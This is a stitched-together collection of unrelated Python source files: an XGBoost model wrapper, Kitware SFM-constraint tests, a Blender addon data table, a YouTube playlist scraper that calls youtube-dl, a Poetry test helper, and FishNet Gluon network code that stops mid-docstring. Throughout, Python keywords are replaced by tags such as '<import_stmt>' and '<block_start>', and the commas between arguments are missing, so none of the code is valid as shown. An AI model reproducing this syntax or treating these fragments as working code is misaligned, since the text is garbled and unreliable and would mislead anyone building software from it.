"""<import_stmt>numpy<as>np<import_stmt>matplotlib<line_sep>matplotlib.use('Agg')<import_stmt>xgboost<as>xgb<class_stmt>XGBRegressor<block_start><def_stmt>__init__ self booster='gbtree' base_score=0. colsample_bylevel=1. colsample_bytree=1. gamma=0. learning_rate=0.1 max_delta_step=0. max_depth=6 min_child_weight=1. missing=<none> n_estimators=100 nthread=1 objective='reg:linear' reg_alpha=1. reg_lambda=0. reg_lambda_bias=0. seed=0 silent=<true> subsample=1.<block_start>self.param={"objective":objective "booster":booster "eta":learning_rate "max_depth":max_depth "colsample_bylevel":colsample_bylevel "colsample_bytree":colsample_bytree "subsample":subsample "min_child_weight":min_child_weight "gamma":gamma "alpha":reg_alpha "lambda":reg_lambda "lambda_bias":reg_lambda_bias "seed":seed "silent":1<if>silent<else>0 "nthread":nthread "max_delta_step":max_delta_step }<line_sep>self.missing=missing<if>missing<is><not><none><else>np.nan<line_sep>self.n_estimators=n_estimators<line_sep>self.base_score=base_score<block_end><def_stmt>__str__ self<block_start><return>self.__repr__()<block_end><def_stmt>__repr__ self<block_start><return>("%s(booster=\'%s\', base_score=%f, colsample_bylevel=%f, \n"<concat>"colsample_bytree=%f, gamma=%f, learning_rate=%f, max_delta_step=%f, \n"<concat>"max_depth=%d, min_child_weight=%f, missing=\'%s\', n_estimators=%d, \n"<concat>"nthread=%d, objective=\'%s\', reg_alpha=%f, reg_lambda=%f, \n"<concat>"reg_lambda_bias=%f, seed=%d, silent=%d, subsample=%f)"%(self.__class__.__name__ self.param["booster"] self.base_score self.param["colsample_bylevel"] self.param["colsample_bytree"] self.param["gamma"] self.param["eta"] self.param["max_delta_step"] self.param["max_depth"] self.param["min_child_weight"] str(self.missing) self.n_estimators self.param["nthread"] self.param["objective"] self.param["alpha"] self.param["lambda"] self.param["lambda_bias"] self.param["seed"] self.param["silent"] self.param["subsample"] ))<block_end><def_stmt>fit self X y feature_names=<none><block_start>data=xgb.DMatrix(X label=y missing=self.missing feature_names=feature_names)<line_sep>data.set_base_margin(self.base_score<times>np.ones(X.shape[0]))<line_sep>self.model=xgb.train(self.param data self.n_estimators)<line_sep><return>self<block_end><def_stmt>predict self X feature_names=<none><block_start>data=xgb.DMatrix(X missing=self.missing feature_names=feature_names)<line_sep>data.set_base_margin(self.base_score<times>np.ones(X.shape[0]))<line_sep>y_pred=self.model.predict(data)<line_sep><return>y_pred<block_end><def_stmt>plot_importance self<block_start>ax=xgb.plot_importance(self.model)<line_sep>self.save_topn_features()<line_sep><return>ax<block_end><def_stmt>save_topn_features self fname="XGBRegressor_topn_features.txt" topn=-1<block_start>ax=xgb.plot_importance(self.model)<line_sep>yticklabels=ax.get_yticklabels()[::-1]<if_stmt>topn<eq>-1<block_start>topn=len(yticklabels)<block_end><else_stmt><block_start>topn=min(topn len(yticklabels))<block_end><with_stmt>open(fname "w")<as>f<block_start><for_stmt>i range(topn)<block_start>f.write("%s\n"%yticklabels[i].get_text())<block_end><block_end><block_end><block_end><class_stmt>XGBClassifier<block_start><def_stmt>__init__ self num_class=2 booster='gbtree' base_score=0. colsample_bylevel=1. colsample_bytree=1. gamma=0. learning_rate=0.1 max_delta_step=0. max_depth=6 min_child_weight=1. missing=<none> n_estimators=100 nthread=1 objective='multi:softprob' reg_alpha=1. reg_lambda=0. reg_lambda_bias=0. 
seed=0 silent=<true> subsample=1.<block_start>self.param={"objective":objective "booster":booster "eta":learning_rate "max_depth":max_depth "colsample_bylevel":colsample_bylevel "colsample_bytree":colsample_bytree "subsample":subsample "min_child_weight":min_child_weight "gamma":gamma "alpha":reg_alpha "lambda":reg_lambda "lambda_bias":reg_lambda_bias "seed":seed "silent":1<if>silent<else>0 "nthread":nthread "max_delta_step":max_delta_step "num_class":num_class }<line_sep>self.missing=missing<if>missing<is><not><none><else>np.nan<line_sep>self.n_estimators=n_estimators<line_sep>self.base_score=base_score<line_sep>self.num_class=num_class<block_end><def_stmt>__str__ self<block_start><return>self.__repr__()<block_end><def_stmt>__repr__ self<block_start><return>("%s(num_class=%d, booster=\'%s\', base_score=%f, colsample_bylevel=%f, \n"<concat>"colsample_bytree=%f, gamma=%f, learning_rate=%f, max_delta_step=%f, \n"<concat>"max_depth=%d, min_child_weight=%f, missing=\'%s\', n_estimators=%d, \n"<concat>"nthread=%d, objective=\'%s\', reg_alpha=%f, reg_lambda=%f, \n"<concat>"reg_lambda_bias=%f, seed=%d, silent=%d, subsample=%f)"%(self.__class__.__name__ self.num_class self.param["booster"] self.base_score self.param["colsample_bylevel"] self.param["colsample_bytree"] self.param["gamma"] self.param["eta"] self.param["max_delta_step"] self.param["max_depth"] self.param["min_child_weight"] str(self.missing) self.n_estimators self.param["nthread"] self.param["objective"] self.param["alpha"] self.param["lambda"] self.param["lambda_bias"] self.param["seed"] self.param["silent"] self.param["subsample"] ))<block_end><def_stmt>fit self X y feature_names=<none><block_start>data=xgb.DMatrix(X label=y missing=self.missing feature_names=feature_names)<line_sep>data.set_base_margin(self.base_score<times>np.ones(X.shape[0]<times>self.num_class))<line_sep>self.model=xgb.train(self.param data self.n_estimators)<line_sep><return>self<block_end><def_stmt>predict_proba self X feature_names=<none><block_start>data=xgb.DMatrix(X missing=self.missing feature_names=feature_names)<line_sep>data.set_base_margin(self.base_score<times>np.ones(X.shape[0]<times>self.num_class))<line_sep>proba=self.model.predict(data)<line_sep>proba=proba.reshape(X.shape[0] self.num_class)<line_sep><return>proba<block_end><def_stmt>predict self X feature_names=<none><block_start>proba=self.predict_proba(X feature_names=feature_names)<line_sep>y_pred=np.argmax(proba axis=1)<line_sep><return>y_pred<block_end><def_stmt>plot_importance self<block_start>ax=xgb.plot_importance(self.model)<line_sep>self.save_topn_features()<line_sep><return>ax<block_end><def_stmt>save_topn_features self fname="XGBClassifier_topn_features.txt" topn=10<block_start>ax=xgb.plot_importance(self.model)<line_sep>yticklabels=ax.get_yticklabels()[::-1]<if_stmt>topn<eq>-1<block_start>topn=len(yticklabels)<block_end><else_stmt><block_start>topn=min(topn len(yticklabels))<block_end><with_stmt>open(fname "w")<as>f<block_start><for_stmt>i range(topn)<block_start>f.write("%s\n"%yticklabels[i].get_text())<block_end><block_end><block_end><block_end><class_stmt>HomedepotXGBClassifier(XGBClassifier)<block_start><def_stmt>__init__ self booster='gbtree' base_score=0. colsample_bylevel=1. colsample_bytree=1. gamma=0. learning_rate=0.1 max_delta_step=0. max_depth=6 min_child_weight=1. missing=<none> n_estimators=100 nthread=1 objective='multi:softprob' reg_alpha=1. reg_lambda=0. reg_lambda_bias=0. 
seed=0 silent=<true> subsample=1.<block_start>super().__init__(num_class=1 booster=booster base_score=base_score colsample_bylevel=colsample_bylevel colsample_bytree=colsample_bytree gamma=gamma learning_rate=learning_rate max_delta_step=max_delta_step max_depth=max_depth min_child_weight=min_child_weight missing=missing n_estimators=n_estimators nthread=nthread objective=objective reg_alpha=reg_alpha reg_lambda=reg_lambda reg_lambda_bias=reg_lambda_bias seed=seed silent=silent subsample=subsample)<line_sep># encode relevance to label
self.encoder={1.00:0 1.25:1 1.33:2 1.50:3 1.67:4 1.75:5 2.00:6 2.25:7 2.33:8 2.50:9 2.67:10 2.75:11 3.00:12 }<line_sep># decode label to relevance
self.decoder={v:k<for>k,v self.encoder.items()}<line_sep>self.num_class=len(self.encoder.keys())<line_sep>self.param["num_class"]=self.num_class<block_end><def_stmt>fit self X y# encode relevance to label
<block_start>y=list(map(self.encoder.get y))<line_sep>y=np.asarray(y dtype=int)<line_sep>super().fit(X y)<line_sep><return>self<block_end><def_stmt>predict self X<block_start>y_pred=super().predict(X)<line_sep># decode label to relevance
y_pred=list(map(self.decoder.get y_pred))<line_sep>y_pred=np.asarray(y_pred dtype=float)<line_sep><return>y_pred<block_end><block_end>
|
"""
ckwg +31
Copyright 2020 by Kitware, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither name of Kitware, Inc. nor the names of any contributors may be used
to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
==============================================================================
Tests for Python interface to vital::sfm_constraints
"""<import_stmt>nose.tools<as>nt<import_stmt>unittest<import_stmt>numpy<as>np<import_from_stmt>kwiver.vital.modules modules<import_from_stmt>kwiver.vital.types.metadata *<import_from_stmt>kwiver.vital.types.metadata_traits *<import_from_stmt>kwiver.vital.types Metadata LocalGeoCS rotation RotationD RotationF SFMConstraints geodesy GeoPoint metadata_tags<as>mt SimpleMetadataMap <line_sep>modules.load_known_modules()<class_stmt>TestSFMConstraints(unittest.TestCase)<block_start>@classmethod<def_stmt>setUp self<block_start>self.meta_=SimpleMetadataMap()<line_sep>self.geo_=LocalGeoCS()<line_sep>self.small_tag=[mt.tags.VITAL_META_UNKNOWN mt.tags.VITAL_META_UNIX_TIMESTAMP mt.tags.VITAL_META_SLANT_RANGE mt.tags.VITAL_META_MISSION_ID mt.tags.VITAL_META_VIDEO_KEY_FRAME ]<line_sep>self.loc1=np.array([-73.759291 42.849631])<line_sep>self.crs_ll=geodesy.SRID.lat_lon_WGS84<line_sep>self.geo_pt1_=GeoPoint(self.loc1 self.crs_ll)<line_sep>self.geo_.geo_origin=self.geo_pt1_<block_end><def_stmt>test_init self<block_start>s=SFMConstraints()<line_sep>SFMConstraints(s)<line_sep>SFMConstraints(self.meta_ self.geo_)<block_end><def_stmt>test_properties self# modules.load_known_modules()
# metadata property
<block_start>s=SFMConstraints(self.meta_ self.geo_)<line_sep>get_meta=s.metadata<line_sep>nt.assert_equal(get_meta.size() 0)<line_sep>m=SimpleMetadataMap()<line_sep>s.metadata=m<line_sep>nt.assert_equal(s.metadata.size() 0)<line_sep># local_geo_property
ret_geo=s.local_geo_cs<line_sep>np.testing.assert_array_almost_equal(ret_geo.geo_origin.location(self.crs_ll) self.geo_pt1_.location())<line_sep>s=SFMConstraints()<line_sep>s.local_geo_cs=self.geo_<line_sep>ret_geo=s.local_geo_cs<line_sep>np.testing.assert_array_almost_equal(ret_geo.geo_origin.location(self.crs_ll) self.geo_pt1_.location())<block_end><def_stmt>test_get_camera_position_prior_local self<block_start>s=SFMConstraints(self.meta_ self.geo_)<line_sep>nt.assert_false(s.get_camera_position_prior_local(0 np.array([0 1 3])))<line_sep>nt.assert_false(s.get_camera_position_prior_local(0 RotationD([1 2 3 4])))<block_end><def_stmt>test_camera_position_priors self<block_start>s=SFMConstraints(self.meta_ self.geo_)<line_sep>nt.assert_dict_equal(s.get_camera_position_priors() {})<block_end><def_stmt>test_image_properties self<block_start>s=SFMConstraints(self.meta_ self.geo_)<line_sep>s.store_image_size(0 1080 720)<line_sep>a,b=0 0<line_sep>founda,foundb=<false> <false><line_sep>founda,a=s.get_image_width(0 a)<line_sep>foundb,b=s.get_image_height(0 b)<line_sep>nt.ok_(founda)<line_sep>nt.ok_(foundb)<line_sep>nt.assert_equal(a 1080)<line_sep>nt.assert_equal(b 720)<line_sep>found_focal=<true><line_sep>focal_len=0.1<line_sep>found_focal,focal_len=s.get_focal_length_prior(0 focal_len)<line_sep>nt.assert_false(found_focal)<line_sep>nt.assert_almost_equal(focal_len 0.1)<block_end><block_end>
|
bl_addon_data={(2 5 3):{(0 0 601):{'binary_name':'ogrekit' 'api_compatibility':{31845:{(0 0 601):(995 -1)}} 'binary_urls':{'linux-32':'<ogrekit 0.0.601 executable URL>' 'linux-64':'<ogrekit 0.0.601 executable URL>' 'windows-32':'<ogrekit 0.0.601 executable URL>' 'windows-64':'<ogrekit 0.0.601 executable URL>' 'osx-intel':'<ogrekit 0.0.601 executable URL>' 'osx-ppc':'<ogrekit 0.0.601 executable URL>'}}}}<line_sep>
|
"""Youtube playlist related functions and classes
are defined here.
"""<import_stmt>json<import_stmt>requests<import_from_stmt>bs4 BeautifulSoup<import_stmt>re<import_from_stmt>playx.utility exe<import_from_stmt>playx.playlist.playlistbase PlaylistBase SongMetadataBase<import_from_stmt>playx.stringutils remove_punct<import_from_stmt>playx.logger Logger<line_sep># Setup logger
logger=Logger("YoutubePlaylist")<class_stmt>YoutubeMetadata(SongMetadataBase)<block_start><def_stmt>__init__ self url="" title=""<block_start>super().__init__(title url "")<line_sep>self._create_search_query()<block_end><def_stmt>_create_search_query self<block_start>"""
Create a search query.
"""<line_sep>self.search_query=self.URL<block_end><def_stmt>display self<block_start>"""Be informative."""<line_sep>logger.info("Title: {}".format(self.title))<block_end><block_end><class_stmt>YoutubePlaylist(PlaylistBase)<block_start>"""
Class to store YouTube playlist data.
This is where we parse the page results ourselves.
Only works for the first 100 songs.
If we want to fetch more, we have to make additional ajax requests or simulate
scrolling, which is another problem.
Refer to `YoutubePlaylist2`.
"""<def_stmt>__init__ self URL pl_start=<none> pl_end=<none><block_start>"""Init the URl."""<line_sep>super().__init__(pl_start pl_end)<line_sep>self.URL=URL<line_sep>self.list_content_tuple=[]<line_sep>self.playlist_name=""<line_sep>self._DELETED=["deleted video" "मेटाइएको भिडियो" "private video" ]<block_end><def_stmt>extract_name self name<block_start>"""Extract the name of the playlist."""<line_sep>name=str(name).replace("\n" "")<line_sep>name="".join(re.findall(r">.*?<" name)).replace(">" "").replace("<" "")<line_sep>name=" ".join(re.findall(r"[^ ]+" name))<line_sep>name=remove_punct(name)<line_sep>self.playlist_name=name<block_end><def_stmt>_is_connection_possible self<block_start>"""Make a simple request to check if connection is possible.
i.e. check if the internet is connected.
"""<line_sep>url="https://google.com"<try_stmt><block_start>requests.get(url)<block_end><except_stmt>requests.exceptions.ConnectionError<block_start><return><false><block_end><return><true><block_end><def_stmt>_check_valid self url<block_start>"""Check if the passed URL is valid."""<line_sep>h={"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux \
x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"}<line_sep>s=BeautifulSoup(requests.get(url headers=h).text "lxml")<line_sep>t='window["ytInitialData"] = '<line_sep>i=next((i<for>i s.find_all("script")<if>t<in>str(i)))<line_sep>i=i.get_text().replace(t "").replace("\n" "")<line_sep>i=re.sub(r'^.*"playabilityStatus"' "" i)<line_sep>i=i.split(",")<line_sep>status=re.sub(r':|\{|"|status' "" i[0])<if_stmt>status<eq>"OK"<block_start><return><true><block_end><else_stmt><block_start>reason=next((r<for>r i<if>'"reason"'<in>r))<line_sep>reason=re.sub(r':|\{|"|reason|simpleText|}' "" reason)<line_sep>logger.info("Skipping {}: {} {}".format(url status reason))<line_sep><return><false><block_end><block_end><def_stmt>extract_playlistdata self<block_start>"""Extract all the videos into YoutubeMetadata objects."""<line_sep>url_prepend="https://www.youtube.com/watch?v="<line_sep>url_base="https://www.youtube.com"<if_stmt><not>self._is_connection_possible()<block_start>logger.warning("Cannot play playlist. No connection detected!")<line_sep><return>"N/A" []<block_end>r=requests.get(self.URL)<line_sep>soup=BeautifulSoup(r.text "html.parser")<line_sep>name=soup.findAll("h1" attrs={"class":"pl-header-title"})<line_sep>self.extract_name(name)<line_sep># soup = soup.findAll('tr', attrs={'class': 'pl-video',
# 'class': 'yt-uix-tile'})
logger.debug(len(soup))<line_sep># use regex to get video url
# this seems rigid against <div> changes
# so far, this works
links=soup.find_all("a" href=re.compile(r".*watch.*")# this regex can be improved in future
)<for_stmt>link links<block_start>href=link["href"]<line_sep>title=link.contents[0]<line_sep># If the link is not a video from playlist, there will be no
# 'index' substring. Hence, we can skip this
<if_stmt>"index"<not><in>href<block_start><continue><block_end># Just to make sure the title is not empty. This is done because
# there is always a first link that contains 'index', yet does not
# have a title. This represents the meta-link: a link to playlist
# itself.
title=title.strip()<if_stmt><not>title<block_start><continue><block_end># Get video url using simple algorithm. This 3 index search is done
# just to make sure it works when the youtube playlist url has these query
# params in shuffled order.
slicer=self._get_url_slicer(href)<line_sep>url=url_base+href[:slicer]<line_sep># Check if the video is deleted. Some videos in playlist turn out
# to be deleted videos. We can put a check for that by checking
# if the title is [Deleted video]
# We have a simpler way to check for deleted videos
<if_stmt>title.lower()[1:-1]<in>self._DELETED<block_start>logger.debug(title.lower()[1:-1])<line_sep>logger.info("Skipping {}: DELETED/BLOCKED/PRIVATE video.".format(url))<line_sep><continue><block_end><if_stmt><not>self._check_valid(url)<block_start><continue><block_end>self.list_content_tuple.append(YoutubeMetadata(url title))<block_end><if_stmt>len(self.list_content_tuple)<eq>0<block_start>logger.warning("Are you sure you have videos in your playlist? Try changing\
privacy to public.")<block_end>self.strip_to_start_end()<block_end><def_stmt>_get_url_slicer self url<block_start>slicers=[]<line_sep>strings=["&index=" "&t=" "&list="]<for_stmt>s strings<block_start><try_stmt><block_start>slicer=url.index(s)<line_sep>slicers.append(slicer)<block_end><except_stmt>ValueError<block_start><continue><block_end><block_end><return>min(slicers)<block_end><block_end><class_stmt>YoutubePlaylist2(YoutubePlaylist)<block_start>"""
Class to store YouTube playlist data.
This uses the youtube-dl --flat-playlist command to fetch everything.
This is more robust since we don't have to parse everything manually.
Plus this solves the ajax/scrolling issue if the playlist has more than
100 songs.
"""<def_stmt>extract_playlistdata self<block_start>url_prepend="https://www.youtube.com/watch?v="<line_sep>url_base="https://www.youtube.com"<if_stmt><not>self._is_connection_possible()<block_start>logger.warning("Cannot play playlist. No connection detected!")<line_sep><return>"N/A" []<block_end># first get playlist name
logger.info(f"Fetching playlist name for [{self.URL}]")<line_sep>r=requests.get(self.URL)<line_sep>soup=BeautifulSoup(r.text "html.parser")<line_sep>name=soup.findAll("h1" attrs={"class":"pl-header-title"})<line_sep>self.extract_name(name)<line_sep>logger.info(f"Playlist name = [{self.playlist_name}]")<line_sep>logger.info("Fetching songs...")<line_sep>cmd=f"youtube-dl -j --flat-playlist {self.URL}"<line_sep>output,errors=exe(cmd)<if_stmt><not>output<and>errors<block_start>logger.error("Unable to extract playlist")<line_sep><return>"N/A" []<block_end>videos=list(map(json.loads output.split("\n")))<line_sep>logger.info(f"Found {len(videos)} songs")<for_stmt>i,video enumerate(videos)<block_start>title=video["title"].strip()<line_sep>url=video["url"]<line_sep>url=url_prepend+url<if_stmt>title.lower()[1:-1]<in>self._DELETED<block_start>logger.debug(title.lower()[1:-1])<line_sep>logger.info(f"Skipping [{url}] Possibly DELETED/BLOCKED/PRIVATE video.")<line_sep><continue><block_end>logger.info(f"Checking if [{title}] [{url}] is available")<if_stmt><not>self._check_valid(url)<block_start>logger.info("Skipping...")<line_sep><continue><block_end>self.list_content_tuple.append(YoutubeMetadata(url title))<block_end><if_stmt>len(self.list_content_tuple)<eq>0<block_start>logger.warning("Are you sure you have videos in your playlist? Try changing\
privacy to public.")<block_end>self.strip_to_start_end()<if_stmt>len(self.list_content_tuple)<eq>0<block_start>logger.warning("Are you sure you have videos in your playlist? Try changing\
privacy to public.")<block_end>self.strip_to_start_end()<block_end><block_end><def_stmt>get_data URL pl_start pl_end<block_start>"""Generic function. Should be called only when
the URL has been verified to be a YouTube playlist.
Returns a tuple containing the songs and name of
the playlist.
"""<line_sep>logger.debug("Extracting Playlist Content")<line_sep>youtube_playlist=YoutubePlaylist2(URL pl_start pl_end)<line_sep>youtube_playlist.extract_playlistdata()<line_sep><return>youtube_playlist.list_content_tuple youtube_playlist.playlist_name<block_end><def_stmt>main <block_start>url="https://www.youtube.com/playlist?list=PLwg22VSCR0W6cwuCKUJSkX72xEvYXS0Zx"<line_sep>print(url)<line_sep>yp=YoutubePlaylist2(url)<line_sep>yp.extract_playlistdata()<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
|
<import_from_future_stmt> annotations<import_from_stmt>pathlib Path<import_from_stmt>typing TYPE_CHECKING<import_from_stmt>poetry.factory Factory<if_stmt>TYPE_CHECKING<block_start><import_from_stmt>tomlkit.container Table<as>TOMLTable<block_end><def_stmt>get_self_command_dependencies locked:bool=<true><arrow>TOMLTable<block_start><import_from_stmt>poetry.console.commands.self.self_command SelfCommand<import_from_stmt>poetry.locations CONFIG_DIR<line_sep>system_pyproject_file=SelfCommand.get_default_system_pyproject_file()<assert_stmt>system_pyproject_file.exists()<assert_stmt>system_pyproject_file.parent<eq>Path(CONFIG_DIR)<if_stmt>locked<block_start><assert_stmt>system_pyproject_file.parent.joinpath("poetry.lock").exists()<block_end>poetry=Factory().create_poetry(system_pyproject_file.parent disable_plugins=<true>)<line_sep>content=poetry.file.read()["tool"]["poetry"]<assert_stmt>"group"<in>content<assert_stmt>SelfCommand.ADDITIONAL_PACKAGE_GROUP<in>content["group"]<assert_stmt>"dependencies"<in>content["group"][SelfCommand.ADDITIONAL_PACKAGE_GROUP]<line_sep><return>content["group"][SelfCommand.ADDITIONAL_PACKAGE_GROUP]["dependencies"]<block_end>
|
"""
FishNet for ImageNet-1K, implemented in Gluon.
Original paper: 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
"""<line_sep>__all__=['FishNet' 'fishnet99' 'fishnet150' 'ChannelSqueeze']<import_stmt>os<import_from_stmt>mxnet cpu<import_from_stmt>mxnet.gluon nn HybridBlock<import_from_stmt>mxnet.gluon.contrib.nn Identity<import_from_stmt>.common pre_conv1x1_block pre_conv3x3_block conv1x1 SesquialteralHourglass InterpolationBlock<import_from_stmt>.preresnet PreResActivation<import_from_stmt>.senet SEInitBlock<def_stmt>channel_squeeze x channels_per_group<block_start>"""
Channel squeeze operation.
Parameters:
----------
x : NDArray
Input tensor.
channels_per_group : int
Number of channels per group.
Returns:
-------
NDArray
Resulting tensor.
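Notes:
-------
The reshape relies on MXNet's special shape codes: 0 keeps the batch axis,
-4 splits the channel axis into (channels_per_group, -1) with -1 inferred as
the number of groups, and -2 copies the remaining spatial axes; the sum over
axis 2 then collapses each group into a single output channel (our reading of
the reshape, added here as documentation only).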
"""<line_sep><return>x.reshape((0 -4 channels_per_group -1 -2)).sum(axis=2)<block_end><class_stmt>ChannelSqueeze(HybridBlock)<block_start>"""
Channel squeeze layer. This is a wrapper over the same operation; it stores the number of channels per group derived from `channels` and `groups`.
Parameters:
----------
channels : int
Number of channels.
groups : int
Number of groups.
"""<def_stmt>__init__ self channels groups **kwargs<block_start>super(ChannelSqueeze self).__init__(**kwargs)<assert_stmt>(channels%groups<eq>0)<line_sep>self.channels_per_group=channels<floordiv>groups<block_end><def_stmt>hybrid_forward self F x<block_start><return>channel_squeeze(x self.channels_per_group)<block_end><block_end><class_stmt>PreSEAttBlock(HybridBlock)<block_start>"""
FishNet specific Squeeze-and-Excitation attention block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
reduction : int, default 16
Squeeze reduction value.
"""<def_stmt>__init__ self in_channels out_channels bn_use_global_stats reduction=16 **kwargs<block_start>super(PreSEAttBlock self).__init__(**kwargs)<line_sep>mid_cannels=out_channels<floordiv>reduction<with_stmt>self.name_scope()<block_start>self.bn=nn.BatchNorm(in_channels=in_channels use_global_stats=bn_use_global_stats)<line_sep>self.relu=nn.Activation("relu")<line_sep>self.conv1=conv1x1(in_channels=in_channels out_channels=mid_cannels use_bias=<true>)<line_sep>self.conv2=conv1x1(in_channels=mid_cannels out_channels=out_channels use_bias=<true>)<line_sep>self.sigmoid=nn.Activation("sigmoid")<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.bn(x)<line_sep>x=self.relu(x)<line_sep>x=F.contrib.AdaptiveAvgPooling2D(x output_size=1)<line_sep>x=self.conv1(x)<line_sep>x=self.relu(x)<line_sep>x=self.conv2(x)<line_sep>x=self.sigmoid(x)<line_sep><return>x<block_end><block_end><class_stmt>FishBottleneck(HybridBlock)<block_start>"""
FishNet bottleneck block for residual unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int
Strides of the convolution.
dilation : int or tuple/list of 2 int
Dilation value for convolution layer.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels out_channels strides dilation bn_use_global_stats **kwargs<block_start>super(FishBottleneck self).__init__(**kwargs)<line_sep>mid_channels=out_channels<floordiv>4<with_stmt>self.name_scope()<block_start>self.conv1=pre_conv1x1_block(in_channels=in_channels out_channels=mid_channels bn_use_global_stats=bn_use_global_stats)<line_sep>self.conv2=pre_conv3x3_block(in_channels=mid_channels out_channels=mid_channels strides=strides padding=dilation dilation=dilation bn_use_global_stats=bn_use_global_stats)<line_sep>self.conv3=pre_conv1x1_block(in_channels=mid_channels out_channels=out_channels bn_use_global_stats=bn_use_global_stats)<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.conv1(x)<line_sep>x=self.conv2(x)<line_sep>x=self.conv3(x)<line_sep><return>x<block_end><block_end><class_stmt>FishBlock(HybridBlock)<block_start>"""
FishNet block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
squeeze : bool, default False
Whether to use a channel squeeze operation.
"""<def_stmt>__init__ self in_channels out_channels strides=1 dilation=1 bn_use_global_stats=<false> squeeze=<false> **kwargs<block_start>super(FishBlock self).__init__(**kwargs)<line_sep>self.squeeze=squeeze<line_sep>self.resize_identity=(in_channels<ne>out_channels)<or>(strides<ne>1)<with_stmt>self.name_scope()<block_start>self.body=FishBottleneck(in_channels=in_channels out_channels=out_channels strides=strides dilation=dilation bn_use_global_stats=bn_use_global_stats)<if_stmt>self.squeeze<block_start><assert_stmt>(in_channels<floordiv>2<eq>out_channels)<line_sep>self.c_squeeze=ChannelSqueeze(channels=in_channels groups=2)<block_end><elif_stmt>self.resize_identity<block_start>self.identity_conv=pre_conv1x1_block(in_channels=in_channels out_channels=out_channels strides=strides bn_use_global_stats=bn_use_global_stats)<block_end><block_end><block_end><def_stmt>hybrid_forward self F x<block_start><if_stmt>self.squeeze<block_start>identity=self.c_squeeze(x)<block_end><elif_stmt>self.resize_identity<block_start>identity=self.identity_conv(x)<block_end><else_stmt><block_start>identity=x<block_end>x=self.body(x)<line_sep>x=x+identity<line_sep><return>x<block_end><block_end><class_stmt>DownUnit(HybridBlock)<block_start>"""
FishNet down unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels out_channels_list bn_use_global_stats **kwargs<block_start>super(DownUnit self).__init__(**kwargs)<with_stmt>self.name_scope()<block_start>self.blocks=nn.HybridSequential(prefix="")<for_stmt>i,out_channels enumerate(out_channels_list)<block_start>self.blocks.add(FishBlock(in_channels=in_channels out_channels=out_channels bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=out_channels<block_end>self.pool=nn.MaxPool2D(pool_size=2 strides=2)<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.blocks(x)<line_sep>x=self.pool(x)<line_sep><return>x<block_end><block_end><class_stmt>UpUnit(HybridBlock)<block_start>"""
FishNet up unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels out_channels_list dilation=1 bn_use_global_stats=<false> **kwargs<block_start>super(UpUnit self).__init__(**kwargs)<with_stmt>self.name_scope()<block_start>self.blocks=nn.HybridSequential(prefix="")<for_stmt>i,out_channels enumerate(out_channels_list)<block_start>squeeze=(dilation<g>1)<and>(i<eq>0)<line_sep>self.blocks.add(FishBlock(in_channels=in_channels out_channels=out_channels dilation=dilation bn_use_global_stats=bn_use_global_stats squeeze=squeeze))<line_sep>in_channels=out_channels<block_end>self.upsample=InterpolationBlock(scale_factor=2 bilinear=<false>)<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.blocks(x)<line_sep>x=self.upsample(x)<line_sep><return>x<block_end><block_end><class_stmt>SkipUnit(HybridBlock)<block_start>"""
FishNet skip connection unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
